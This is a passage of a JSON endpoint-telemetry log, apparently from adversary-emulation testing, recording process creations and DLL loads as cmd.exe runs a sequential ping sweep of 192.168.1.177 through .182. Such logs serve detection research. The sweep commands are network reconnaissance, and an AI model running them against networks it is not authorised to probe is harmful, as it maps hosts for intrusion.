"ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "process", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572851830000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.177", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5428, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "process", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572856990000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.178", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1916, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572857130000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857300000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857300000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857300000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "process", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572861830000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.179", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1544, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "process", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572866990000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.180", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2784, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572867130000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867300000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "process", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572871830000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.181", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2228, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572871980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "process", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572876840000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.182", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5736, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5736, - "process_name": "PING.EXE", - 